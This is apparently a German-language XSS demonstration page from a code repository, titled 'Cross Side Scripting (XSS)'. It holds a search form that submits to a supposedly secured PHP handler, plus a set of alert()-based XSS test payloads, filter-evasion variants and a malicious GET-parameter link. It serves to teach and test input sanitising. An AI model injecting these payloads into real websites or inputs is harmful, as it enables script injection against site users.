-
Notifications
You must be signed in to change notification settings - Fork 0
/
XSS-secure.html
74 lines (56 loc) · 1.89 KB
/
XSS-secure.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Cross Side Scripting (XSS)</title>
</head>
<body>
<form method="get" rel="search" action="XSS1-secure.php">
<label for="search">Suchen: </label>
<input id="search" name="parameter" >
<button type="submit" >Suche!</button>
</form>
<br/>
<a href="XSS.html">XSS</a>
<br><br>
<h2>Simple Example</h2>
<textarea style="width: 100%">
<script> alert("Sie wurden gehackt");</script>
</textarea>
<h2>Using CharCode</h2>
<textarea style="width: 100%">
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
</textarea>
<h2>No Quotes</h2>
<textarea style="width: 100%">
<SCRIPT>alert(String.fromCharCode(88, 83, 83))</SCRIPT>
</textarea>
<h2>On Mouseover</h2>
<textarea style="width: 100%">
<p onmouseover=javascript:alert("XSS")>mouseover</p>
</textarea>
<h2>Attribute Value</h2>
<textarea style="width: 100%">
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
</textarea>
<h2>Attribute Value</h2>
<textarea style="width: 100%">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
</textarea>
<h2>Attribute Value, Hex-Codes</h2>
<textarea style="width: 100%">
<img src=x
onerror="javascript:alert('XSS')">
</textarea>
<h2>In Tag, Escaped</h2>
<textarea style="width: 100%">
<<SCRIPT>alert("XSS");//<</SCRIPT>
</textarea>
<h2>As GET-Parameter</h2>
<a href='./XSS1-secure.php?parameter=<script type="text/javascript">alert("XSS")</script>'>XSS per Link</a>
<br/>
<br/>
<a href="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#XSS_Locator_.28short.29">mehr XSS</a>
</body>
</html>